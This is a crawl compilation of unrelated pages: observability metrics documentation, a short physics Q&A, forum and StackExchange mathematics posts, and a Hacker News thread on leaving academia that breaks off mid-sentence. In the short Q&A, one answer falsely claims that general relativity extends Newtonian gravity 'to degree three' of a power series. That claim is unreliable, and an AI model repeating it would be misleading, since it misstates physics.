whatever is in that macro library folder.
2022-12-10 07:59:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.47582295536994934, "perplexity": 1129.9937269979953}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710421.14/warc/CC-MAIN-20221210074242-20221210104242-00464.warc.gz"}
https://docs.observeinc.com/en/latest/content/metrics/ExpressionBuilder.html
# Adding Metrics Using the Expression Builder¶ The Expression Builder feature allows you to build metrics expressions in Observe. For instance, you might want to visualize CPU usage for an application. You can add metrics to a new worksheet or dashboard or an existing worksheet or dashboard. ## Accessing the Expression Builder¶ You can access the Expression Builder using one of three methods: ### From a Metrics dataset¶ 1. In Observe, click Explore , and then click Metrics. Figure 1 - The Metrics landing page 2. Select a metric from the list of available metrics. 3. On the Metric Selected card, click Open In Worksheet. 4. Locate the Expression Builder tab underneath the displayed data. Figure 2 - Metrics Worksheet with Expression Builder ### Add a metric to a Worksheet¶ To add a metric to a worksheet, use the following steps: 1. Open an existing worksheet or create a new one from an event dataset. 2. Click Add Content and select Metrics. 3. Select a metric from the list of related metrics. Figure 3 - Adding Metrics to a Worksheet ### Access from Dashboard¶ Access the Expression Builder from a Dashboard card: 1. In Observe, click Explore, and then Dashboards. 2. Select a Dashboard from the list. 3. On a card with metrics, click the More icon, and select Open in Worksheet. 4. Click Add Content and select Metrics. 5. Select a metric, such as cpu_utilization, and click Select. 6. Locate the Expression Builder tab underneath the displayed data. ## Overview of Expression Builder¶ ### Section One - Expression Builder¶ • Metric - When you click Metric under Add Content, Observe displays a list of available metrics that you can select to add. Figure 4 - Select from a list of available metrics. • where - select from a list of available filters for the metric. This is an optional parameter. • Sum by - the default value for the OPAL function is Sum by. You can select from the following list of available OPAL functions: • Any - Return any value of one column across a group. • Any not null - Return any non-null value of one column across a group. Can still return null if all values in the group are null • Average - Calculate the arithmetic average of the input expression across the group. • Count Values - Count the number of non-null items in the group. • Count Distinct Fast - Estimate the approximate number of distinct values in the input using hyper-log-log. • Count Distinct Exact - Count the exact number of distinct values in the input using complete enumeration. • Maximum - Compute the maximum of one column across a group (with one argument) or the scalar greatest value of its arguments (with more than one argument). • Median* - Return the fast approximate median value of one column. • Median Exact - Return the exact median value of one column. • Minimum - Compute the minimum of one column across a group with one argument or the scalar least value of its arguments with more than one argument. • Percentile(99) - Returns an approximated value for the specified percentile of the input expression across the group. percentile(@."*metric*", .99 • Percentile(95) - Returns an approximated value for the specified percentile of the input expression across the group. percentile(@."*metric*", .95 • Percentile(90) - Returns an approximated value for the specified percentile of the input expression across the group. percentile(@.”metric”, .90 • Percentile(75) - Returns an approximated value for the specified percentile of the input expression across the group. percentile(@.”metric”, .75 • Percentile(50) - Returns an approximated value for the specified percentile of the input expression across the group. percentile(@.”metric”, .50 • Prometheus Quantile(99) - Returns a value for 99th percentile distribution. • Prometheus Quantile(95) - Returns a value for 95th percentile distribution. • Prometheus Quantile(90) - Returns a value for 90th percentile distribution. • Prometheus Quantile(75) - Returns a value for 75th percentile distribution. • Prometheus Quantile(50) - Returns a value for 50th percentile distribution. • Standard Deviation - Calculate the standard deviation across the group. • Sum - Calculate the sum of the argument across the group or the scalar arguments if more than one. • Don’t Aggregate - Do not aggregate metrics. Note You can only use Prometheus Quantile parameters with Prometheus metrics ending in _bucket. • by - Select a field from the list of available fields to filter the metric. • Add formula - Add a formula to further refine your data. For instance, you can add A*100 to multiply your results by 100. If you click the More icon next to Field, you can see the following options: Figure 5 - More options for metric expressions • Add function>TopK - Selects all data for each of top k ranked groups. • Adjust alignment - Aggregates the metric to an average of the data over a minute. Automatically enabled by default. • Adjust resolution - Set the length of time to collect data. Automatically enabled by default. • Delete - Removes the metric expression from the monitor. ### Adding CPU Utilization Metrics to a Worksheet¶ 1. In Observe, click Explore , and then click Datasets. 2. From the list of datasets, select CPU Metrics. 3. Click the Worksheet icon to create a worksheet from the metrics. 4. Click Add Content and then select Metric. 5. In the Search field of the metrics, enter cpu_utilization, and select it from the list. 6. A new stage, Stage 2, displays on the worksheet. 7. The Expression Builder displays the data using Sum, however, selecting Average shows the average CPU usage. Select the type of average from the by list. 8. The metrics average by Host by default, but you can select from the following parameters: • cpu • host • datacenter • field • value Figure 6 - Adding CPU utilization to the CPU Metrics worksheet. Figure 7 - Usage per User with Sum by Host You can also filter the metric using JSON and parameters contained in columns. Figure 8 - Filtering the CPU Utilization metric using JSON in the field` column.
2023-03-25 08:33:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1890765130519867, "perplexity": 3213.042365438969}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945317.85/warc/CC-MAIN-20230325064253-20230325094253-00145.warc.gz"}
https://www.acooke.org/cute/TaylorExpa0.html
## Taylor Expansions of Spacetime From: andrew cooke <andrew@...> Date: Tue, 22 Dec 2015 11:01:02 -0300 Q: If spacetime was an analytic manifold could we see into the future by expanding locally as a power series? A: This is what physics attempts to do: expand physical laws in terms of a power series. For example, Newton's law of gravitation expanded the force of gravity to the second degree and Einstein's general relativity extends this to degree three. Andrew
2021-10-28 15:01:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.765806257724762, "perplexity": 2447.9900394240703}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588341.58/warc/CC-MAIN-20211028131628-20211028161628-00230.warc.gz"}
https://www.physicsforums.com/threads/separation-of-variables.673241/
# Homework Help: Separation of variables 1. Feb 20, 2013 ### aaaa202 Suppose you have some partiel DE describing a physical system with 2 degrees of freedom (e.g. the SE). If you try separation of variables you get something like: Hg(x)h(y) = Eg(x)h(y) now you can separate this to two eqautions, but the energy has to go in one of them. Is the final expression for the energy dependent on which one you choose to put it in? 2. Feb 21, 2013 ### vela Staff Emeritus E typically doesn't go with one or the other. When separation works, what happens is you get $$\hat{H}[g(x)h(y)] = G(x)h(y) + g(x)H(y).$$ The Hamiltonian acts on each piece separately. Then you can divide both sides by g(x)h(y) to get $$\frac{G(x)}{g(x)} + \frac{H(y)}{h(y)} = E.$$ The only way this can be satisfied for all x and y is if the two terms on the left are each constants. The energy is the sum of those constants.
2018-07-21 17:53:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7371856570243835, "perplexity": 392.2331797818381}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676592650.53/warc/CC-MAIN-20180721164755-20180721184755-00092.warc.gz"}
https://math.stackexchange.com/tags/p-adic-number-theory/hot?filter=all
# Tag Info ## Hot answers tagged p-adic-number-theory 217 votes Accepted ### Why does an argument similiar to 0.999...=1 show 999...=-1? If you want to understand the mathematics behind these things, it is all based upon the notions of 'convergence' and of 'limits'. If you read any first course in analysis textbook you will find the ... • 2,504 114 votes ### Why does an argument similiar to 0.999...=1 show 999...=-1? In the $10$-adic numbers it is true that $\dots 9999 = -1$. More precisely, the series $\sum_{n=0}^{\infty} 9 \cdot 10^n$ converges in $\mathbb{Q}_{10}$ and its limit there is $-1$. • 41.2k 46 votes ### Why does an argument similiar to 0.999...=1 show 999...=-1? As other users have noted, it doesn't make sense to have infinitely many nines to the left of the decimal point. This is because the sequence $9, 99, 999, \ldots$ doesn't converge to anything, unlike ... • 12.4k 33 votes Accepted ### Units of p-adic integers This must be covered in almost every text on the $p$-adic numbers; I think the book of Gouvêa is the best of these. And your statement is not quite true: for $p=2$, $\mu_{p-1}$ is trivial all right, ... • 60.5k 26 votes Accepted ### Ring of the integer $p$-adic numbers $\mathbb{Z}_p$ Let's look at a different ring first: $R=k[[X]]$, the ring of formal power series over a field. We can also think of $R$ as the ring of sequences $f_0, f_1, f_2,\ldots$, where each $f_i$ is a ... • 29.4k 25 votes Accepted ### Method of finding a p-adic expansion to a rational number The short answer is, long division. Say you want to find the $5$-adic expansion of $1/17$. You start by writing $$\frac{1}{17}=k+5q$$ with $k \in \{0,1,2,3,4\}$ and $q$ a $5$-adic integer (that is, ... • 36.8k 23 votes ### Why does an argument similiar to 0.999...=1 show 999...=-1? One thing to think about is how this plays with modular arithmetic, if you're familiar. Basically, arithmetic mod $10^n$ is arithmetic where we only care about the last $n$ digits of a number and is ... • 59.1k 23 votes • 32.9k 14 votes Accepted The question of whether two "numbers" are "equal" is a somewhat subtle one. For example, lets work with a simpler number, namely "2". Certainly $2\in\mathbb{Z}$, but also $2\in\mathbb{Q},2\in\mathbb{... • 11.9k 14 votes ### Why are$p$-adic numbers and$p$-adic integers only defined for$p$prime? I was going on at too great length in a comment to a discussion between Henning Makholm and Hurkyl, so let me put it all into an answer instead: To show that$\Bbb Z_{10}\cong\Bbb Z_2\times\Bbb Z_5$, ... • 60.5k 13 votes Accepted ### sequence$\{a^{p^{n}}\}$converges in the p-adic numbers. Recall that the Euler totient function has values$\phi(p^n)=p^{n-1}(p-1)=p^n-p^{n-1}$for all$n$. This means that for all$a$coprime to$p$we have the congruence $$a^{p^n}\equiv a^{p^{n-1}}\pmod{... • 125k 13 votes ### Method of finding a p-adic expansion to a rational number In the case of -1/6, it’s very easy:$$-\frac{1}{6} = \frac{1}{1-7} = \sum_{k=0}^∞ 7^k.$$What happens: In the p-adic numbers, the sequence p^k is a null sequence (as |p^k|_p = p^{-k} \overset{... • 17.9k 13 votes Accepted ### Totally ramified extensions of \mathbb{Q}_p This is an exercise I’ve never done, but it should be a lot of fun. What is the general Eisenstein polynomial in this case? it’ll be$$ X^3 + 2aX^2+2bX+2(1+2c)\,, $$where a, b, and c can be any ... • 60.5k 13 votes Accepted ### A puzzle involving 10-adic numbers I saw this observation in a math book once when I was 16 or so and was totally baffled at the time. It's nice to know I understand it now! As you say, the starting point is to use CRT, which allows us ... • 387k 12 votes Accepted ### The maximal unramified extension of a local field may not be complete This is a natural question, because it’s really easy to get overwhelmed by the situation. In the case of the completion of the maximal unramified of a local field k, here’s the way that I look at ... • 60.5k 12 votes ### If B is an abelian group, then is B{\otimes}_{\mathbb Z}{\mathbb Z}_p isomorphic to {\varprojlim}B/p^{n}B? This is false in general: consider B = \mathbb{Q}. Then \mathbb{Q} \otimes_{\mathbb{Z}} \mathbb{Z}_p \cong \mathbb{Q}_p, but \mathbb{Q} / p^n \mathbb{Q} = 0 for every n, so \varprojlim_n \... • 2,472 12 votes Accepted ### Various p-adic integrals Not really an full answer, but some comments (that hopefully answer some of your queries). There seems to be a big confusion here : what do we want to integrate, i.e. to define \int_{\mathbb{Z}_p} f(... • 2,034 12 votes ### Why are p-adic numbers and p-adic integers only defined for p prime? You can speak about 10-adic numbers just fine, but they don't behave as nicely as p-adic numbers. For example, the 10-adic integers have zero divisors, so no matter how you complete or massage ... 11 votes Accepted ### examples of unramified extensions of \mathbb{Q}_p You get unramified extensions of \Bbb Q_p by adjoining roots of unity of order prime to p; alternatively, by adjoining (p^n-1)-th roots of unity. The finite unramified extensions of \Bbb Q_p ... • 60.5k 11 votes ### Why introduce the p-adic numbers? On one hand, the p-adic numbers are extremely natural objects of study: by Ostrowski's theorem every nontrivial absolute value on \mathbf Q is equivalent to either the usual absolute value or the ... • 496 11 votes Accepted ### Classical number theoretic applications of the p-adic numbers One of my favourite classical results using p-adic methods in elementary number theory is the theorem of Skolem-Mahler-Lech: This is a theorem about linear recurrence sequences, which are sequences ... • 4,315 10 votes ### Which p-adic fields contain these numbers? There are several ways of attacking questions like this. The most general is to transform your defining equation (such as for \sqrt{-7}, which I’ll use as the type example) into something to which ... • 60.5k 10 votes Accepted ### Is 123456788910111121314\cdots a p-adic integer? This is not an n-adic integer or a p-adic integer. A pivotal idea of a p-adic integer is that it can be well-represented in a sort-of-base-p,$$ x = \sum_{k \geq \ell}a_kp^k,$$and in ... • 87.6k 10 votes ### Why does an argument similiar to 0.999...=1 show 999...=-1? This argument is similar to the one$$ \sum_{n=1}^\infty n = -1/12$$which went viral a few years ago. You are actually using methods which were originally designed for manipulating absolutly ... • 659 10 votes Accepted ### Is there concept of continuous curve and surfaces in p-adic field? The$p$-adic numbers are a metric space, and thus a topological space. Therefore continuity is well defined, either by the$\varepsilon,\delta\$ definition that you know from Calculus, or by the ... • 60.5k Only top scored, non community-wiki answers of a minimum length are eligible
2022-11-26 12:35:28
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8071486353874207, "perplexity": 920.8551159391279}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446706291.88/warc/CC-MAIN-20221126112341-20221126142341-00312.warc.gz"}
https://news.ycombinator.com/item?id=2235349
Goodbye to academic research 270 points by rsaarelm on Feb 18, 2011 | hide | past | web | favorite | 92 comments Reading this article makes me realize I certainly picked the road not taken. Last year I quit my job as the Director of IT at a small pharma, dropped out of a company-paid MBA program, drastically reduced my expenses, and started doing independent research. A lot of people around me thought I was crazy especially since I wasn't going the PhD or startup route either. In my mind though, it seems pretty logical - I want to do real computer science research without all the BS that goes on with academia or corporate research lab.I'm more productive when working solo than in teams. And I already have a specific research project in mind. All I needed was to plan my life so I'd have 50-60hr/week free after my bills were paid. For the past two months, I've been working on my research project diligently and without any external delays. I know I won't get a degree out of this and I doubt I can get published but since that's not my end-goal, it doesn't matter. I am looking for a hardware hacker if anyone is interested - it is a very fun/rewarding project: http://ktype.net I did the same thing about ten years ago: I quit a high-paying job in Zurich, moved to Prague on-the-cheap, and hired two Czech PhD students part-time. We spent five years doing CS research and it was always two-steps forward, one back. Every three or four months we would throw everything out and start again; and we had the freedom to do so. There was no installed base, no one tapping their fingers expectantly. Looking back, I wouldn’t have done it any other way. I think you made a great choice. Good luck! Would you mind telling us what has happened since? Sure. The mission was to find a new way to approach how software is constructed. The result is called Kayia and it's here: http://kayia.org/kayia.pdfIt hit 'singularity' (everything came down to a graph edge; the system is comprised of nothing else) in 2005. I've had some great advisors and the feedback is consistent, “That it’s unique is not interesting if it's not compelling. Show how it’s compelling.” So I’ve stumbled with my limited resources over the years to do that and I’ve come up with a database, of all things, but it’s actually the "programming language" masquerading as a database.I'm thinking of offering it as a service and if you want to see where that's going, it's at http://www.kayadb.com (although it’s not meant to be looked at yet). I'll do a Tell HN when in a few weeks when it's closer to being ready to show. Is it opensource? Can you also provide a link to the source code?Is it an RDBMS or a NoSQL? How can I download and use your DB? It's not ready yet. It's NoSQL, scales to 4EB on the back-end but handles the relational model. Not open source for varying reasons. It will be a service at first. But it's not ready yet. I'll definitely let HN know when it is, and if anyone wants to be an early user, please contact me. It sounded unique that I wanted to experiment with a ML algorithm but our product is GPL so if its not opensource we cannot use it for legal reasons. I feel for you... creating a better paradigm is a compelling problem but also can be a seductive trap.It's hard to have new paradigm without compelling "front end" - either a powerful tool or some really simple example code.Another thought; software development is plagued by a set of "typical problems". Another way to present a new paradigm would be to show a few problems with a discussion of how your approach would get around them.The world is full of powerful languages. Their problem is that they give you a bigger cannon to shoot yourself in the foot with after a point.If you want to create a truly "amazing new paradigm", show ways that you would either untangle an existing mess or ways you'd prevent that mess from happening. Doing independent research like this is very cool. I admire your willingness to take such a risk and make this sacrifice. One comment I would add is that, while you might be more "productive" solo (less context switching/blocking I assume ;), working with others forces you to maintain a persuasive, crisp story about why what your doing is the right thing. While early, exploratory research can temporarily delay the need for this story, it can't be delayed long!From the info on your website, it looks like you are developing keyboard layouts that would be useful for people with disabilities. However, I was unable to figure out what your elevator speech for this work might be. What is your hypothesis? What evidence do you have for it? What disability(ies) are you targeting? How will new mobile keyboard help?Lastly, this looks like a useful project for others (you're not just proving random theorems in your basement :)! Why not re-frame this in your mind as a startup? Good luck! I am definitely getting input from as many people as I can. Within a month, I'm going to start working with my potential users and their caretakers so that'll be real feedback.I'm targeting http://ktype.net/wiki/research:disabilities which prevent people from talking or using a keyboard - Stephen Hawkings of the world as well as autistic children with major speech problems. There are many existing solutions out there to help people with disabilities but there are also very wide gaps in between. I'm trying to catalog everything I can find to help fill in the gaps and I will make my own bridges if necessary.The new keyboard is an iPad app (Demo: http://ktype.net/wiki/dev:demo ) and it will be extremely customizable. On the iPad itself, you can already define your own keys/layout: http://ktype.net/wiki/research:articles:progress_20110204Additionally, I'm working on a vastly better auto-suggest feature: http://ktype.net/wiki/research:articles:progress_20110209 than a cellphone T9. Also, I want to make it work with a variety of hardware input devices. If you are a researcher making a brain-reading interface for paralyzed patients, don't hook it up to Windows! KType will learn from each user's patterns and will be customizable enough to support easy communication. I'm also going to integrate Twitter/email etc. soon enough - http://ktype.net/wiki/dev:roadmapDon't get me started I can keep talking about this 24/7 :) This is the exact same thing i am planning to do. i am currently in a lavish tech consultancy firm, but the whole idea of being a "resource" is really stagnating my brain, and also objectivizes humanity. I still can't stand being called a resource.Im planning on quitting soon, and doing independent research while creating non-startup apps. Posts like this (and the link above) really motivate me. :)Best of luck to ya! Thanks! Same to you. Feel free to keep me updated with your research projects. Are you just doing research for researches sake? If so good for you. If not, why try and do it independently? Don't you think you deserve to be rewarded for your work? i.e. compensated either with prestige or money? At the very least would you like to be compensated for you contributions to the field? I guess I'm doing it for the end-goal's sake. I really do want people with disabilities to be able to communicate better, including my own cousin. As long as my bills are being paid (regardless of the source of income), I don't need any rewards. I'm not a saint or anything - I just don't want to deal with the overhead of funding, grants, scholarships, sales, marketing, clients, customers. I want to make a usable, innovative product and keep improving it. A few years ago my preliminary version got #1 on HN ( http://chir.ag/projects/ktype/ ) and since that day I have been working hard to change my life so I could work on it full-time. Took over a year but I can finally do it now, so I'm very happy. You might not want "customers" but nothing will help you innovate like users. Where I work we get mountains of feedback and use it to justify new features and to prioritize bug fixes. I wholeheartedly agree and I intend to start working with my potential users very soon. Prestige and compensation are two ways of being rewarded. Another way is to just see your work make the world a better place and feel satisfied. What is the ultimate goal of your research? If you are simply doing research for the fun of it, then you can only continue it without funding for as long as you have runway capital. I ask this question because I've thought about doing the same thing, but I'm not sure I could productize the research I want to do, so it scares me to begin and basically throw away my savings for no tangible benefit. I'd appreciate your thoughts. I was very careful to pick realistic, targetable goals for my research project, KType. World peace wouldn't cut it. KType has the goals of: * Improving communication for people with disabilities * Creating low-cost software / hardware tools, customizable for each individual * Providing useful research material and articles for families & friends * Sharing case studies of actual users Money doesn't factor into this because over the past few years, I've worked hard to ensure my bills are paid without me having to work full-time. My research project goals have to do with the real project's usability and accessibility and not orthogonal accomplishments like publishing papers, getting grants etc. That's all I need to keeps me in focus. Every minute I work on KType, I am actually working on KType. It's a very slow process but at least I know I'm moving in the right direction. Watch for the 8 month wtf collapse, stay in bed for the requisite week, and then just get back up again. This is a very interesting comment. It reads a bit like "phd hacking". Did you try this? The work done by the OP is indeed has potential to be published. The above comment, while written in an encouraging tone, has some caveats that might be worth pointing out."(1) At at least some of the best US research universities, there is no coursework requirement for a Ph.D."* I find that to be untrue. In my case, I had a M.S. before applying, and still had to take nearly 2 years of required coursework. It depends on the program, but I have not heard of any U.S. program that will accept a B.S. and not have required classes."(2) The requirement for a dissertation is, say, "an original contribution to knowledge worthy of publication". Since you've already been there, done that, got the T-shirt, there's no question. Big, huge advantage."* Most students accepted to the best PhD programs (computer science) will already have top-tier publications before entering. It is definitely a good thing to have a publication, but rather than being finished, you will have just begun."(3) One more requirement would likely be the qualifying exams. These exams are to show that you are 'qualified' to move on to research and do research. But, uh, did I mention that you've already been there, done that, got the T-shirt?"* Quals will still require reading deeply from the literature. You will be expected to know all the fundamentals in your computer science area to pass. Having published is irrelevant here."Maybe the US DoD VA would give you a grant."* Often only professors can apply for the big grants, and writing a grant is actually non-trivial. They need to see a fantastic track record, a solid proven team, and often nods to diversity and educating the public. Some students will help their advisors write the grant, but in the end it's the advisor who doles out the money and is the PI.I feel the attitude of professors/academia being so easy to fool to be somewhat overstated here. I won't go into the "ease of publishing" comments, but my first top-tier publication took 3 years with many rejections, when I was an a non-student doing research. I also did a lot of research that was rejected and went into the "paper graveyard". After doing it a few times, publishing is significantly easier since you will better know the methodology, literature, and how to write academically. I'm not trying to be discouraging, but I find the above comment to be optimistic but a bit exaggerated. I find that to be untrue. In my case, I had a M.S. before applying, and still had to take nearly 2 years of required coursework. It depends on the program, but I have not heard of any U.S. program that will accept a B.S. and not have required classes.*Then go to the U.K. or the majority of the commonwealth. Required coursework is not a necessary part of doctoral research in many, many departments of these universities. Just a small comment--Princeton used to not require coursework--only quals. but it is rare to see this in current universities. Thank you for the very useful comment, but why do you have so many uh words in your comment? Each indicates a non-standard, somewhat politically incorrect, 'street-wise', hush-hush, secret of the real world remark! Even so, it breaks the flow of the sentence. It's actually quite jarring to read.I think it would be clear what they were even without the extra indication -- perhaps personal preference, though.(This is not to belittle the content you've got -- really interesting stuff, pretty well backed up. awesome.) Nice comment and one reason I write here.Writing politically incorrect comments can cause a lot of high emotions that can ruin the content. Somehow some signal is needed to 'qualify' the content as, say, "not in the usual academic style"! Looks like I need a better signal. I'd like to get in touch with you sometime. Can you please share your contact info? If you don't want to put it in your profile, you can email it to me kirubakaran@gmail.com You're only getting one side of this, and before you find yourself in complete agreement ask yourself this: Are you agreeing because it confirms your bias and opinion of the academic system?I got a PhD from Cambridge. Everyone I worked with was helpful to a fault. Everyone shared credit when it was due, and declined offers of credit when they felt they hadn't contributed enough.I got my PhD, got a 3 year post-doc, changed fields into another 3 year post-doc, then got head-hunted into industry.My experience of academia couldn't be more different from the one described here.There's a story told of an elderly gentleman sitting sunning himself outside the city gates when a traveller came by. "What are people like here?" asked the traveller. "What were they like where you came from?" asked the elderly gentleman. Then no matter what the answer, he'd always say: "You'll find people here pretty much the same."I'm not saying that this individual didn't have bad experiences, I'm not saying he deserved them, I'm not saying academia is all roses, and I'm not saying manipulative sociopaths don't exist. They do.But my personal experience is different. If I remember correctly you studied math, didn't you? Competition for a job in math is way lower than it is for biological sciences. The reason is that the current model of a successful biology lab is that of a PI leading a number of students and postdocs anywhere from 5 to 20. There is NO WAY that all of them are going to find a job in academia. Germany alone produces in one year the same number of PhDs as there are professors in the country. Ratios are not very different in UK and US. Most of the competition happens in the biological sciences: you can run math or CS research by yourself. Difficult to do the same in biology.I've written about it here: http://gilest.ro/2010/what-has-changed-in-science-and-what-m... "Competition for a job in math is way lower than it is for biological sciences."Actually, the opposite is true, at least in the United States. Many more Biological Science PhDs are granted relative to mathematics, but there is also a lot more funding in the life sciences relative to mathematics.The mathematics job market is more similar to the notorious humanities market than to the life sciences. You hardly have postdoctoral positions in math, physics and social sciences. Lots of people still manage to get an assistant professor position after PhD. Postdocs emerged only recently and they are a buffer for those who cannot get a TT job after PhD. In biology it is absolutely normaly, in fact necessary, to go through ~5 yrs of postdoc before dreaming of applying. The estimates I know about math is that 1/5 of graduated get a job in academia. In biology is about order of magnitude more difficult (some less backed up estimates even claim is 1/300). "You hardly have postdoctoral positions in math, physics and social sciences."I don't know anything about the social sciences. In physics, I know that postdocs are absolutely necessary and expected, to the same degree that they are in the life sciences.Mathematics is a little different. There are a very small minority of prodigy-types that go right from graduate school to the tenure track. However, post-doc's are still the norm, although they don't go by the name 'postdoc.' Usually they are pronounced 'visiting assistant professor' or 'instructor.'Here's an example of a 'postdoc' in mathematics. All of the big universities have them: I second this. My experience getting a PhD in grad-school (biochemistry) was a wonderful time in my life where I was surrounded by bright, helpful, passionate people. While I was in that lab I saw lots of people get nice academic jobs and other people get nice jobs in industry. Now I'm in a post-doc in a happy lab full of bright passionate people. I regularly see people around me get good academic jobs. It is not easy, and does require a lot of devotion, skill, and luck (what doesn't?) but no-one should read this article and think that everyone in science is miserable. It works out for some people and not for others... just like everything else. Exactly - it sounds like he might have stumbled into the wrong lab. Like you, my experience has been very different, but I've certainly heard stories like his from house mates. It seems we were lucky.The other thing that occurred to me when I read this, was that he's constructed a false dichotomy for himself: work in a world-class place, which is probably indeed much like being an olympic athlete, or work in an absolutely rubbish place, which can't really support your research. Anything missing in the middle?? I complain about the state of academia all the time and went straight from my PhD to a startup, but I completely agree with you. My experience was rather wonderful. That's the hard part about things like this. It's almost completely subjective, so doing a study would be difficult. We're left with dueling anecdotes from credible people. Different fields vary a lot also, so it's probably not that useful to try to talk about "academia" as a whole. Not only do we have dueling anecdotes, but they aren't even anecdotes on the same subject. =] Imo, the pros and cons of being a physics versus a philosophy versus a CS academic just aren't that similar.I can believe that the 'hard' sciences are roughly like he says, at least at many places. It's common for there to be a sort of "lab" mentality, with a lot of grad-student cogs in a famous-professor-lab machine, and credit tends to go to the head of the lab (especially if the paper has 50 authors or something, as is common in some areas). Partly that's because it takes a lot of money to set up a physics/chem/bio lab, and there is a lot of grunt-work to be done.That's less common in CS, I think. Not inexistent, but you can find a research group that isn't like that. It's even less common in the humanities, but then you have a whole different set of problems (less money, fewer jobs). I think it varies drastically by subfield. I'm a physicist, and while there are some subcommunties that are cutthroat, there are many that are small and where people are pretty helpful to each other. I think a lot of it may also depend on the size of the community and the amount of money involved. The stories my ex-girlfriend told me about pharma research sounded pretty horrible... This is how many, many professions work. Musicians, writers, inventors, athletes, research scientists, pilots, and even small business owners all have the same career path. A few really driven, really lucky ones win the lottery and get to be household names. A small minority (maybe 1 - 5%) make an upper middle class living. The other 99% work for poor wages until they give up or get used up. It sucks, but it's hardly unique to science. If you're in a profession with a massive oversupply of labor, you can pretty much be guaranteed to see this kind of structure.I also spent half the article thinking that the author's struggles with vocabulary and grammar might explain his/her struggles to get ahead. Perhaps he/she is a non-native speaker and that's adding to the trouble? As an ex-classical musician, I can attest to your first point. However, the science Ph.D. glut seems to be generating more angst these days than it used to. I attribute this in part to rising tuition costs and greater student debt loads and an ever increasing disparity between supply and demand. I believe this Economist article was recently referenced on HN:http://www.economist.com/node/17723223?story_id=17723223Indeed, the production of PhDs has far outstripped demand for university lecturers. In a recent book, Andrew Hacker and Claudia Dreifus, an academic and a journalist, report that America produced more than 100,000 doctoral degrees between 2005 and 2009. In the same period there were just 16,000 new professorships. Using PhD students to do much of the undergraduate 